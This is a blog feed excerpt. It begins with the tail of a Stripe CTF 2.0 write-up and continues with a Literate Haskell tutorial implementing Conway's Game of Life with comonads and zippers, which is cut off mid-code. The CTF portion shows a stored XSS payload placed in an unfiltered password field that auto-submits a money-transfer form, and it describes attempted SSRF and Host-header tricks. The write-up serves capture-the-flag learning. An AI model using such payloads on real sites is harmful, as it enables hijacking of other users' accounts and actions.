<div class="sourceCode" id="cb15"><pre class="sourceCode ruby"><code class="sourceCode ruby"><span id="cb15-1"><a href="#cb15-1" aria-hidden="true" tabindex="-1"></a><span class="cf">unless</span> username <span class="op">=~</span> <span class="ss">/^</span><span class="sc">\w</span><span class="ss">+$/</span></span>
<span id="cb15-2"><a href="#cb15-2" aria-hidden="true" tabindex="-1"></a>  die(<span class="st">&quot;Invalid username. Usernames must match /^</span><span class="sc">\w</span><span class="st">+$/&quot;</span>, <span class="wa">:register</span>)</span>
<span id="cb15-3"><a href="#cb15-3" aria-hidden="true" tabindex="-1"></a><span class="cf">end</span></span></code></pre></div>
<p>But as the password is presented, it is also a possibility. It turns out that it
is not filtered, and thus exploitable.</p>
<p>Let’s create a user “x” with the following password:</p>
<div class="sourceCode" id="cb16"><pre class="sourceCode javascript"><code class="sourceCode javascript"><span id="cb16-1"><a href="#cb16-1" aria-hidden="true" tabindex="-1"></a><span class="op">&lt;</span>script<span class="op">&gt;</span></span>
<span id="cb16-2"><a href="#cb16-2" aria-hidden="true" tabindex="-1"></a>  <span class="kw">var</span> f <span class="op">=</span> <span class="bu">document</span><span class="op">.</span><span class="at">forms</span>[<span class="dv">0</span>]<span class="op">;</span></span>
<span id="cb16-3"><a href="#cb16-3" aria-hidden="true" tabindex="-1"></a>  f[<span class="st">&#39;to&#39;</span>]<span class="op">.</span><span class="at">value</span><span class="op">=</span><span class="st">&quot;x&quot;</span><span class="op">;</span></span>
<span id="cb16-4"><a href="#cb16-4" aria-hidden="true" tabindex="-1"></a>  f[<span class="st">&#39;amount&#39;</span>]<span class="op">.</span><span class="at">value</span><span class="op">=</span><span class="st">&quot;100&quot;</span><span class="op">;</span></span>
<span id="cb16-5"><a href="#cb16-5" aria-hidden="true" tabindex="-1"></a>  f<span class="op">.</span><span class="fu">submit</span>()<span class="op">;</span></span>
<span id="cb16-6"><a href="#cb16-6" aria-hidden="true" tabindex="-1"></a><span class="op">&lt;/</span>script<span class="op">&gt;</span></span></code></pre></div>
<p>And to deliver this payload, we just have to send karma to <em>karma_fountain</em>. A
minute later or so, its password appears.</p>
<h2 id="level-5-the-domainauthenticator">Level 5 : the DomainAuthenticator</h2>
<p>I couldn’t finish this level. This level is also a <a href="http://www.sinatrarb.com/">Sinatra</a> web application,
which can make POST requests to hosts ending in <code>stripe-ctf.com</code>. When the
response contains “AUTHENTICATED”, you are marked as logged in as this host. The
goal is to log in as a host name matching <code>^level05-\d+\.stripe-ctf\.com$</code>.
I tried two different techniques.</p>
<p>The first one is to have the level 5 host make a request to itself, so that this
request triggers another request to an arbitrary controlled server (the server
from level 2 can be used for this). The main problem is that the application
needs 3 parameters : “username”, “password” and “pingback”, and it passes the
only first two of them to the pingback URL. I tried header injection (injecting
a <code>&amp;pingback=...</code> at the end of the password), but it was filtered out.</p>
<p>The second one is to slightly abuse HTTP : a same host can have two hostnames
and serve a different content depending on the “Host:” HTTP header. If the level
2 and level 5 run on the same IP, we could run a custom HTTP server on a high
port, so that the POST would succeed (this would work because there is no check
that the port is 80). Unfortunately, the two levels run on different hosts, so
this does not work.</p>
<h2 id="other-levels">Other levels</h2>
<p>A lot of complete solutions have been published since, for example <a href="http://blog.matthewdfuller.com/2012/08/stripe-capture-flag-level-by-level.html">this
one</a>. I’m quite frustrated because I’m almost sure that I tried
adding a <code>?pingback</code> parameter on level 5. Anyway, I hope that the next edition
will be as interesting as this one, and that this time, I’ll win a t-shirt :)</p>]]></description>
    <pubDate>Thu, 30 Aug 2012 00:00:00 UT</pubDate>
    <guid>http://blog.emillon.org/posts/2012-08-30-stripe-ctf-2.0.html</guid>
    <dc:creator>Etienne Millon</dc:creator>
</item>
<item>
    <title>Comonadic Life</title>
    <link>http://blog.emillon.org/posts/2012-10-18-comonadic-life.html</link>
    <description><![CDATA[<h2 id="of-monads-and-comonads">Of monads and comonads</h2>
<p>This post is written in <a href="http://www.haskell.org/haskellwiki/Literate_programming">Literate Haskell</a>. This means that you can copy it into
a <code>.lhs</code> file<a href="#fn1" class="footnote-ref" id="fnref1" role="doc-noteref"><sup>1</sup></a> and run it through a Haskell compiler or interpreter.</p>
<p>Today we’ll talk about…</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="kw">import</span> <span class="dt">Control.Comonad</span></span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a><span class="kw">import</span> <span class="dt">Control.Monad</span></span></code></pre></div>
<p>Comonads ! They are the categoric dual of monads, which means that the type
signatures of comonadic functions look like monadic functions, but with the
arrow reversed. I am not an expert in category theory, so I won’t go further.</p>
<p>I will use the following typeclass for comonads : it’s from <a href="http://comonad.com">Edward Kmett</a>’s
<a href="http://hackage.haskell.org/package/comonad-3.0.0.2/docs/Control-Comonad.html">comonad package</a> (split from the infamous <a href="http://hackage.haskell.org/package/category-extras-1.0.2">category-extras package</a>).</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode haskell"><code class="sourceCode haskell"><span id="cb2-1"><a href="#cb2-1" aria-hidden="true" tabindex="-1"></a><span class="kw">class</span> <span class="dt">Functor</span> w <span class="ot">=&gt;</span> <span class="dt">Comonad</span> w <span class="kw">where</span></span>
<span id="cb2-2"><a href="#cb2-2" aria-hidden="true" tabindex="-1"></a><span class="ot">  extract ::</span> w a <span class="ot">-&gt;</span> a</span>
<span id="cb2-3"><a href="#cb2-3" aria-hidden="true" tabindex="-1"></a><span class="ot">  extend ::</span> (w a <span class="ot">-&gt;</span> b) <span class="ot">-&gt;</span> w a <span class="ot">-&gt;</span> w b</span>
<span id="cb2-4"><a href="#cb2-4" aria-hidden="true" tabindex="-1"></a><span class="ot">  duplicate ::</span> w a <span class="ot">-&gt;</span> w (w a)</span></code></pre></div>
<p><code>extend</code> or <code>duplicate</code> are optional, as one can be written in terms of the
other one. The Monad typeclass, for reference, can be described as<a href="#fn2" class="footnote-ref" id="fnref2" role="doc-noteref"><sup>2</sup></a> :</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode haskell"><code class="sourceCode haskell"><span id="cb3-1"><a href="#cb3-1" aria-hidden="true" tabindex="-1"></a><span class="kw">class</span> <span class="dt">Functor</span> m <span class="ot">=&gt;</span> <span class="dt">Monad</span> m <span class="kw">where</span></span>
<span id="cb3-2"><a href="#cb3-2" aria-hidden="true" tabindex="-1"></a><span class="ot">  return ::</span> a <span class="ot">-&gt;</span> m a</span>
<span id="cb3-3"><a href="#cb3-3" aria-hidden="true" tabindex="-1"></a><span class="ot">  (=&lt;&lt;) ::</span> (a <span class="ot">-&gt;</span> m b) <span class="ot">-&gt;</span> m a <span class="ot">-&gt;</span> m b</span>
<span id="cb3-4"><a href="#cb3-4" aria-hidden="true" tabindex="-1"></a><span class="ot">  join ::</span> m (m a) <span class="ot">-&gt;</span> m a</span></code></pre></div>
<p>The duality is quite easy to see : <code>extract</code> is the dual of <code>return</code>, <code>extend</code>
the one of <code>(=&lt;&lt;)</code> and <code>duplicate</code> the one of <code>join</code>.</p>
<p>So what are comonads good for ?</p>
<p>I stumbled upon <a href="http://blog.sigfpe.com/2006/12/evaluating-cellular-automata-is.html">an article</a> which explains that they can be
used for computations which depend on some local environment, like <a href="http://en.wikipedia.org/wiki/Cellular_automaton">cellular
automata</a>. Comments ask whether it’s possible to generalize to higher
dimensions, which I will do by implementing <a href="http://en.wikipedia.org/wiki/Conway%27s_Game_of_Life">Conway’s Game of Life</a> in a
comonadic way.</p>
<h2 id="list-zippers">List Zippers</h2>
<p>List zippers are a fantastic data structure, allowing O(1) edits at a “cursor”.
Moving the cursor element to element is O(1) too. This makes it a very nice data
structure when your edits are local (say, in a text editor). You can learn more
about zippers in general in this <a href="http://blog.ezyang.com/2010/04/you-could-have-invented-zippers/">post from Edward Z Yang</a>. The seminal paper is
of course <a href="http://www.st.cs.uni-saarland.de/edu/seminare/2005/advanced-fp/docs/huet-zipper.pdf">Huet’s article</a>.</p>
<p>A list zipper is composed of a cursor and two lists.</p>
<div class="sourceCode" id="cb4"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb4-1"><a href="#cb4-1" aria-hidden="true" tabindex="-1"></a><span class="kw">data</span> <span class="dt">ListZipper</span> a <span class="ot">=</span> <span class="dt">LZ</span> [a] a [a]</span></code></pre></div>
<p>To go in a direction, you pick the head of a list, set it as your cursor, and
push the cursor on top of the other list. We assume that we will only infinte
lists, so this operation can not fail. This assumption is reasonnable especially
in the context of cellular automata<a href="#fn3" class="footnote-ref" id="fnref3" role="doc-noteref"><sup>3</sup></a>.</p>
<div class="sourceCode" id="cb5"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb5-1"><a href="#cb5-1" aria-hidden="true" tabindex="-1"></a><span class="ot">listLeft ::</span> <span class="dt">ListZipper</span> a <span class="ot">-&gt;</span> <span class="dt">ListZipper</span> a</span>
<span id="cb5-2"><a href="#cb5-2" aria-hidden="true" tabindex="-1"></a>listLeft (<span class="dt">LZ</span> (l<span class="op">:</span>ls) x rs) <span class="ot">=</span> <span class="dt">LZ</span> ls l (x<span class="op">:</span>rs)</span>
<span id="cb5-3"><a href="#cb5-3" aria-hidden="true" tabindex="-1"></a>listLeft _ <span class="ot">=</span> <span class="fu">error</span> <span class="st">&quot;listLeft&quot;</span></span>
<span id="cb5-4"><a href="#cb5-4" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb5-5"><a href="#cb5-5" aria-hidden="true" tabindex="-1"></a><span class="ot">listRight ::</span> <span class="dt">ListZipper</span> a <span class="ot">-&gt;</span> <span class="dt">ListZipper</span> a</span>
<span id="cb5-6"><a href="#cb5-6" aria-hidden="true" tabindex="-1"></a>listRight (<span class="dt">LZ</span> ls x (r<span class="op">:</span>rs)) <span class="ot">=</span> <span class="dt">LZ</span> (x<span class="op">:</span>ls) r rs</span>
<span id="cb5-7"><a href="#cb5-7" aria-hidden="true" tabindex="-1"></a>listRight _ <span class="ot">=</span> <span class="fu">error</span> <span class="st">&quot;listRight&quot;</span></span></code></pre></div>
<p>Reading and writing on a list zipper at the cursor is straightforward :</p>
<div class="sourceCode" id="cb6"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb6-1"><a href="#cb6-1" aria-hidden="true" tabindex="-1"></a><span class="ot">listRead ::</span> <span class="dt">ListZipper</span> a <span class="ot">-&gt;</span> a</span>
<span id="cb6-2"><a href="#cb6-2" aria-hidden="true" tabindex="-1"></a>listRead (<span class="dt">LZ</span> _ x _) <span class="ot">=</span> x</span>
<span id="cb6-3"><a href="#cb6-3" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-4"><a href="#cb6-4" aria-hidden="true" tabindex="-1"></a><span class="ot">listWrite ::</span> a <span class="ot">-&gt;</span> <span class="dt">ListZipper</span> a <span class="ot">-&gt;</span> <span class="dt">ListZipper</span> a</span>
<span id="cb6-5"><a href="#cb6-5" aria-hidden="true" tabindex="-1"></a>listWrite x (<span class="dt">LZ</span> ls _ rs) <span class="ot">=</span> <span class="dt">LZ</span> ls x rs</span></code></pre></div>
<p>We can also define a function to convert a list zipper to a list, for example
for printing. As it’s infinite on both sizes, it’s not possible to convert it to
the whole list, so we have to pass a size parameter.</p>
<div class="sourceCode" id="cb7"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb7-1"><a href="#cb7-1" aria-hidden="true" tabindex="-1"></a><span class="ot">toList ::</span> <span class="dt">ListZipper</span> a <span class="ot">-&gt;</span> <span class="dt">Int</span> <span class="ot">-&gt;</span> [a]</span>
<span id="cb7-2"><a href="#cb7-2" aria-hidden="true" tabindex="-1"></a>toList (<span class="dt">LZ</span> ls x rs) n <span class="ot">=</span></span>
<span id="cb7-3"><a href="#cb7-3" aria-hidden="true" tabindex="-1"></a>  <span class="fu">reverse</span> (<span class="fu">take</span> n ls) <span class="op">++</span> [x] <span class="op">++</span> <span class="fu">take</span> n rs</span></code></pre></div>
<p>We can easily define a <code>Functor</code> instance for <code>ListZipper</code>. To apply a function
on whole zipper, we apply it to the cursor and map it on the two lists :</p>
<div class="sourceCode" id="cb8"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb8-1"><a href="#cb8-1" aria-hidden="true" tabindex="-1"></a><span class="kw">instance</span> <span class="dt">Functor</span> <span class="dt">ListZipper</span> <span class="kw">where</span></span>
<span id="cb8-2"><a href="#cb8-2" aria-hidden="true" tabindex="-1"></a>  <span class="fu">fmap</span> f (<span class="dt">LZ</span> ls x rs) <span class="ot">=</span> <span class="dt">LZ</span> (<span class="fu">map</span> f ls) (f x) (<span class="fu">map</span> f rs)</span></code></pre></div>
<p>Time for the <code>Comonad</code> instance. The <code>extract</code> method returns an element from
the structure : we can pick the one at the cursor.</p>
<p><code>duplicate</code> is a bit harder to grasp. From a list zipper, we have to build a
list zipper of list zippers. The signification behind this (confirmed by the
comonad laws that every instance has to fulfill) is that moving inside the
duplicated structure returns the original structure, altered by the same
move : for example, <code>listRead (listLeft (duplicate z)) == listLeft z</code>.</p>
<p>This means that at the cursor of the duplicated structure, there is the original
structure <code>z</code>. And the left list is composed of <code>listLeft z</code>, <code>listLeft (listLeft z)</code>, <code>listLeft (listLeft (listLeft z))</code>, etc (same goes for the right
list).</p>
<p>The following function applies repeatedly two movement functions on each side of
the zipper (its type is more generic than needed for this specific case but
we’ll instanciate <code>z</code> with something other than <code>ListZipper</code> in the next
section).</p>
<div class="sourceCode" id="cb9"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb9-1"><a href="#cb9-1" aria-hidden="true" tabindex="-1"></a><span class="ot">genericMove ::</span> (z a <span class="ot">-&gt;</span> z a)</span>
<span id="cb9-2"><a href="#cb9-2" aria-hidden="true" tabindex="-1"></a>            <span class="ot">-&gt;</span> (z a <span class="ot">-&gt;</span> z a)</span>
<span id="cb9-3"><a href="#cb9-3" aria-hidden="true" tabindex="-1"></a>            <span class="ot">-&gt;</span> z a</span>
<span id="cb9-4"><a href="#cb9-4" aria-hidden="true" tabindex="-1"></a>            <span class="ot">-&gt;</span> <span class="dt">ListZipper</span> (z a)</span>
<span id="cb9-5"><a href="#cb9-5" aria-hidden="true" tabindex="-1"></a>genericMove a b z <span class="ot">=</span></span>
<span id="cb9-6"><a href="#cb9-6" aria-hidden="true" tabindex="-1"></a>  <span class="dt">LZ</span> (iterate&#39; a z) z (iterate&#39; b z)</span>
<span id="cb9-7"><a href="#cb9-7" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb9-8"><a href="#cb9-8" aria-hidden="true" tabindex="-1"></a><span class="ot">iterate&#39; ::</span> (a <span class="ot">-&gt;</span> a) <span class="ot">-&gt;</span> a <span class="ot">-&gt;</span> [a]</span>
<span id="cb9-9"><a href="#cb9-9" aria-hidden="true" tabindex="-1"></a>iterate&#39; f <span class="ot">=</span> <span class="fu">tail</span> <span class="op">.</span> <span class="fu">iterate</span> f</span></code></pre></div>
<p>And finally we can implement the instance.</p>
<div class="sourceCode" id="cb10"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb10-1"><a href="#cb10-1" aria-hidden="true" tabindex="-1"></a><span class="kw">instance</span> <span class="dt">Comonad</span> <span class="dt">ListZipper</span> <span class="kw">where</span></span>
<span id="cb10-2"><a href="#cb10-2" aria-hidden="true" tabindex="-1"></a>  extract <span class="ot">=</span> listRead</span>
<span id="cb10-3"><a href="#cb10-3" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb10-4"><a href="#cb10-4" aria-hidden="true" tabindex="-1"></a>  duplicate <span class="ot">=</span> genericMove listLeft listRight</span></code></pre></div>
<p>Using this comonad instance we can already implement 1D cellular automata, as
explained in the <a href="http://blog.sigfpe.com/2006/12/evaluating-cellular-automata-is.html">sigfpe article</a>. Let’s see how they can be extended to 2D
automata.</p>
<h2 id="plane-zippers">Plane zippers</h2>
<p>Let’s generalize list zippers to plane zippers, which are cursors on a plane
of cells. We will implement them using a list zipper of list zippers.</p>
<div class="sourceCode" id="cb11"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb11-1"><a href="#cb11-1" aria-hidden="true" tabindex="-1"></a><span class="kw">data</span> <span class="dt">Z</span> a <span class="ot">=</span> <span class="dt">Z</span> (<span class="dt">ListZipper</span> (<span class="dt">ListZipper</span> a))</span></code></pre></div>
<p>We start by defining move functions. As a convention, the external list will
hold lines : to move up and down, we will really move left and right at the root
level.</p>
<div class="sourceCode" id="cb12"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb12-1"><a href="#cb12-1" aria-hidden="true" tabindex="-1"></a><span class="ot">up ::</span> <span class="dt">Z</span> a <span class="ot">-&gt;</span> <span class="dt">Z</span> a</span>
<span id="cb12-2"><a href="#cb12-2" aria-hidden="true" tabindex="-1"></a>up (<span class="dt">Z</span> z) <span class="ot">=</span> <span class="dt">Z</span> (listLeft z)</span>
<span id="cb12-3"><a href="#cb12-3" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb12-4"><a href="#cb12-4" aria-hidden="true" tabindex="-1"></a><span class="ot">down ::</span> <span class="dt">Z</span> a <span class="ot">-&gt;</span> <span class="dt">Z</span> a</span>
<span id="cb12-5"><a href="#cb12-5" aria-hidden="true" tabindex="-1"></a>down (<span class="dt">Z</span> z) <span class="ot">=</span> <span class="dt">Z</span> (listRight z)</span></code></pre></div>
<p>For left and right, it is necessary to alter every line, using the <code>Functor</code>
instance.</p>
<div class="sourceCode" id="cb13"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb13-1"><a href="#cb13-1" aria-hidden="true" tabindex="-1"></a><span class="ot">left ::</span> <span class="dt">Z</span> a <span class="ot">-&gt;</span> <span class="dt">Z</span> a</span>
<span id="cb13-2"><a href="#cb13-2" aria-hidden="true" tabindex="-1"></a>left (<span class="dt">Z</span> z) <span class="ot">=</span> <span class="dt">Z</span> (<span class="fu">fmap</span> listLeft z)</span>
<span id="cb13-3"><a href="#cb13-3" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb13-4"><a href="#cb13-4" aria-hidden="true" tabindex="-1"></a><span class="ot">right ::</span> <span class="dt">Z</span> a <span class="ot">-&gt;</span> <span class="dt">Z</span> a</span>
<span id="cb13-5"><a href="#cb13-5" aria-hidden="true" tabindex="-1"></a>right (<span class="dt">Z</span> z) <span class="ot">=</span> <span class="dt">Z</span> (<span class="fu">fmap</span> listRight z)</span></code></pre></div>
<p>Finally, editing is quite straightforward : reading is direct (first read the line,
then the cursor) ; and in order to write, it is necessary to fetch the current
line, write to it and write the new line.</p>
<div class="sourceCode" id="cb14"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb14-1"><a href="#cb14-1" aria-hidden="true" tabindex="-1"></a><span class="ot">zRead ::</span> <span class="dt">Z</span> a <span class="ot">-&gt;</span> a</span>
<span id="cb14-2"><a href="#cb14-2" aria-hidden="true" tabindex="-1"></a>zRead (<span class="dt">Z</span> z) <span class="ot">=</span> listRead <span class="op">$</span> listRead z</span>
<span id="cb14-3"><a href="#cb14-3" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb14-4"><a href="#cb14-4" aria-hidden="true" tabindex="-1"></a><span class="ot">zWrite ::</span> a <span class="ot">-&gt;</span> <span class="dt">Z</span> a <span class="ot">-&gt;</span> <span class="dt">Z</span> a</span>
<span id="cb14-5"><a href="#cb14-5" aria-hidden="true" tabindex="-1"></a>zWrite x (<span class="dt">Z</span> z) <span class="ot">=</span></span>
<span id="cb14-6"><a href="#cb14-6" aria-hidden="true" tabindex="-1"></a>  <span class="dt">Z</span> <span class="op">$</span> listWrite newLine z</span>
<span id="cb14-7"><a href="#cb14-7" aria-hidden="true" tabindex="-1"></a>    <span class="kw">where</span></span>
<span id="cb14-8"><a href="#cb14-8" aria-hidden="true" tabindex="-1"></a>      newLine <span class="ot">=</span> listWrite x oldLine</span>
<span id="cb14-9"><a href="#cb14-9" aria-hidden="true" tabindex="-1"></a>      oldLine <span class="ot">=</span> listRead z</span></code></pre></div>
<p>Time for algebra. Let’s define a <code>Functor</code> instance : applying a function
everywhere can be achieved by applying it on every line.</p>
<div class="sourceCode" id="cb15"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb15-1"><a href="#cb15-1" aria-hidden="true" tabindex="-1"></a><span class="kw">instance</span> <span class="dt">Functor</span> <span class="dt">Z</span> <span class="kw">where</span></span>
<span id="cb15-2"><a href="#cb15-2" aria-hidden="true" tabindex="-1"></a>  <span class="fu">fmap</span> f (<span class="dt">Z</span> z) <span class="ot">=</span> <span class="dt">Z</span> (<span class="fu">fmap</span> (<span class="fu">fmap</span> f) z)</span></code></pre></div>
<p>The idea behind the <code>Comonad</code> instance for <code>Z</code> is the same that the <code>ListZipper</code>
one : moving “up” in the structure (really, “left” at the root level) returns
the original structure moved in this direction.</p>
<p>We will reuse the <code>genericMove</code> defined earlier in order to build list zippers
that describe movements in the two axes<a href="#fn4" class="footnote-ref" id="fnref4" role="doc-noteref"><sup>4</sup></a>.</p>
<div class="sourceCode" id="cb16"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb16-1"><a href="#cb16-1" aria-hidden="true" tabindex="-1"></a><span class="ot">horizontal ::</span> <span class="dt">Z</span> a <span class="ot">-&gt;</span> <span class="dt">ListZipper</span> (<span class="dt">Z</span> a)</span>
<span id="cb16-2"><a href="#cb16-2" aria-hidden="true" tabindex="-1"></a>horizontal <span class="ot">=</span> genericMove left right</span>
<span id="cb16-3"><a href="#cb16-3" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb16-4"><a href="#cb16-4" aria-hidden="true" tabindex="-1"></a><span class="ot">vertical ::</span> <span class="dt">Z</span> a <span class="ot">-&gt;</span> <span class="dt">ListZipper</span> (<span class="dt">Z</span> a)</span>
<span id="cb16-5"><a href="#cb16-5" aria-hidden="true" tabindex="-1"></a>vertical <span class="ot">=</span> genericMove up down</span></code></pre></div>
<p>This is enough to define the instance.</p>
<div class="sourceCode" id="cb17"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb17-1"><a href="#cb17-1" aria-hidden="true" tabindex="-1"></a><span class="kw">instance</span> <span class="dt">Comonad</span> <span class="dt">Z</span> <span class="kw">where</span></span>
<span id="cb17-2"><a href="#cb17-2" aria-hidden="true" tabindex="-1"></a>  extract <span class="ot">=</span> zRead</span>
<span id="cb17-3"><a href="#cb17-3" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb17-4"><a href="#cb17-4" aria-hidden="true" tabindex="-1"></a>  duplicate z <span class="ot">=</span></span>
<span id="cb17-5"><a href="#cb17-5" aria-hidden="true" tabindex="-1"></a>    <span class="dt">Z</span> <span class="op">$</span> <span class="fu">fmap</span> horizontal <span class="op">$</span> vertical z</span></code></pre></div>
<h2 id="conways-comonadic-game-of-life">Conway’s (comonadic) Game of Life</h2>
<p>Let’s define a neighbourhood function. Here, directions are moves on a plane
zipper. Neighbours are : horizontal moves, vertical moves and their
compositions (<code>liftM2 (.)</code>)<a href="#fn5" class="footnote-ref" id="fnref5" role="doc-noteref"><sup>5</sup></a>.</p>
<div class="sourceCode" id="cb18"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb18-1"><a href="#cb18-1" aria-hidden="true" tabindex="-1"></a><span class="ot">neighbours ::</span> [<span class="dt">Z</span> a <span class="ot">-&gt;</span> <span class="dt">Z</span> a]</span>
<span id="cb18-2"><a href="#cb18-2" aria-hidden="true" tabindex="-1"></a>neighbours <span class="ot">=</span></span>
<span id="cb18-3"><a href="#cb18-3" aria-hidden="true" tabindex="-1"></a>  horiz <span class="op">++</span> vert <span class="op">++</span> liftM2 (<span class="op">.</span>) horiz vert</span>
<span id="cb18-4"><a href="#cb18-4" aria-hidden="true" tabindex="-1"></a>    <span class="kw">where</span></span>
<span id="cb18-5"><a href="#cb18-5" aria-hidden="true" tabindex="-1"></a>      horiz <span class="ot">=</span> [left, right]</span>
<span id="cb18-6"><a href="#cb18-6" aria-hidden="true" tabindex="-1"></a>      vert  <span class="ot">=</span> [up, down]</span>
<span id="cb18-7"><a href="#cb18-7" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb18-8"><a href="#cb18-8" aria-hidden="true" tabindex="-1"></a><span class="ot">aliveNeighbours ::</span> <span class="dt">Z</span> <span class="dt">Bool</span> <span class="ot">-&gt;</span> <span class="dt">Int</span></span>
<span id="cb18-9"><a href="#cb18-9" aria-hidden="true" tabindex="-1"></a>aliveNeighbours z <span class="ot">=</span></span>
<span id="cb18-10"><a href="#cb18-10" aria-hidden="true" tabindex="-1"></a>  card <span class="op">$</span> <span class="fu">map</span> (\ dir <span class="ot">-&gt;</span> extract <span class="op">$</span> dir z) neighbours</span>
<span id="cb18-11"><a href="#cb18-11" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb18-12"><a href="#cb18-12" aria-hidden="true" tabindex="-1"></a><span class="ot">card ::</span> [<span class="dt">Bool</span>] <span class="ot">-&gt;</span> <span class="dt">Int</span></span>
<span id="cb18-13"><a href="#cb18-13" aria-hidden="true" tabindex="-1"></a>card <span class="ot">=</span> <span class="fu">length</span> <span class="op">.</span> <span class="fu">filter</span> (<span class="op">==</span><span class="dt">True</span>)</span></code></pre></div>
<p>The core rule of the game fits in the following function : if two neighbours are
alive, return the previous state ; if three neighbours are alive, a new cell is
born, and any other count causes the cell to die (of under-population or
overcrowding).</p>
<p>It is remarkable that its type is the dual of that of a Kleisli arrow (<code>a -&gt; m b</code>).</p>
<div class="sourceCode" id="cb19"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb19-1"><a href="#cb19-1" aria-hidden="true" tabindex="-1"></a><span class="ot">rule ::</span> <span class="dt">Z</span> <span class="dt">Bool</span> <span class="ot">-&gt;</span> <span class="dt">Bool</span></span>
<span id="cb19-2"><a href="#cb19-2" aria-hidden="true" tabindex="-1"></a>rule z <span class="ot">=</span></span>
<span id="cb19-3"><a href="#cb19-3" aria-hidden="true" tabindex="-1"></a>  <span class="kw">case</span> aliveNeighbours z <span class="kw">of</span></span>
<span id="cb19-4"><a href="#cb19-4" aria-hidden="true" tabindex="-1"></a>    <span class="dv">2</span> <span class="ot">-&gt;</span> extract z</span>
<span id="cb19-5"><a href="#cb19-5" aria-hidden="true" tabindex="-1"></a>    <span class="dv">3</span> <span class="ot">-&gt;</span> <span class="dt">True</span></span>
<span id="cb19-6"><a href="#cb19-6" aria-hidden="true" tabindex="-1"></a>    _ <span class="ot">-&gt;</span> <span class="dt">False</span></span></code></pre></div>
<p>And then the comonadic magic happens with the use of <code>extend</code> :</p>
<div class="sourceCode" id="cb20"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb20-1"><a href="#cb20-1" aria-hidden="true" tabindex="-1"></a><span class="ot">evolve ::</span> <span class="dt">Z</span> <span class="dt">Bool</span> <span class="ot">-&gt;</span> <span class="dt">Z</span> <span class="dt">Bool</span></span>
<span id="cb20-2"><a href="#cb20-2" aria-hidden="true" tabindex="-1"></a>evolve <span class="ot">=</span> extend rule</span></code></pre></div>
<p><code>evolve</code> is our main transition function between world states, and yet it’s only
defined in terms of the local transition function !</p>
<p>Let’s define a small printer to see what’s going on.</p>
<div class="sourceCode" id="cb21"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb21-1"><a href="#cb21-1" aria-hidden="true" tabindex="-1"></a><span class="ot">dispLine ::</span> <span class="dt">ListZipper</span> <span class="dt">Bool</span> <span class="ot">-&gt;</span> <span class="dt">String</span></span>
<span id="cb21-2"><a href="#cb21-2" aria-hidden="true" tabindex="-1"></a>dispLine z <span class="ot">=</span></span>
<span id="cb21-3"><a href="#cb21-3" aria-hidden="true" tabindex="-1"></a>  <span class="fu">map</span> dispC <span class="op">$</span> toList z <span class="dv">6</span></span>
<span id="cb21-4"><a href="#cb21-4" aria-hidden="true" tabindex="-1"></a>    <span class="kw">where</span></span>
<span id="cb21-5"><a href="#cb21-5" aria-hidden="true" tabindex="-1"></a>      dispC <span class="dt">True</span>  <span class="ot">=</span> <span class="ch">&#39;*&#39;</span></span>
<span id="cb21-6"><a href="#cb21-6" aria-hidden="true" tabindex="-1"></a>      dispC <span class="dt">False</span> <span class="ot">=</span> <span class="ch">&#39; &#39;</span></span>
<span id="cb21-7"><a href="#cb21-7" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb21-8"><a href="#cb21-8" aria-hidden="true" tabindex="-1"></a><span class="ot">disp ::</span> <span class="dt">Z</span> <span class="dt">Bool</span> <span class="ot">-&gt;</span> <span class="dt">String</span></span>
<span id="cb21-9"><a href="#cb21-9" aria-hidden="true" tabindex="-1"></a>disp (<span class="dt">Z</span> z) <span class="ot">=</span></span>
<span id="cb21-10"><a href="#cb21-10" aria-hidden="true" tabindex="-1"></a>  <span class="fu">unlines</span> <span class="op">$</span> <span class="fu">map</span> dispLine <span class="op">$</span> toList z <span class="dv">6</span></span></code></pre></div>
<p>Here is the classic glider pattern to test. The definition has a lot of
boilerplate because we did not bother to create a <code>fromList</code> function.</p>
<div class="sourceCode" id="cb22"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb22-1"><a href="#cb22-1" aria-hidden="true" tabindex="-1"></a><span class="ot">glider ::</span> <span class="dt">Z</span> <span class="dt">Bool</span></span>
<span id="cb22-2"><a href="#cb22-2" aria-hidden="true" tabindex="-1"></a>glider <span class="ot">=</span></span>
<span id="cb22-3"><a href="#cb22-3" aria-hidden="true" tabindex="-1"></a>  <span class="dt">Z</span> <span class="op">$</span> <span class="dt">LZ</span> (<span class="fu">repeat</span> fz) fz rs</span>
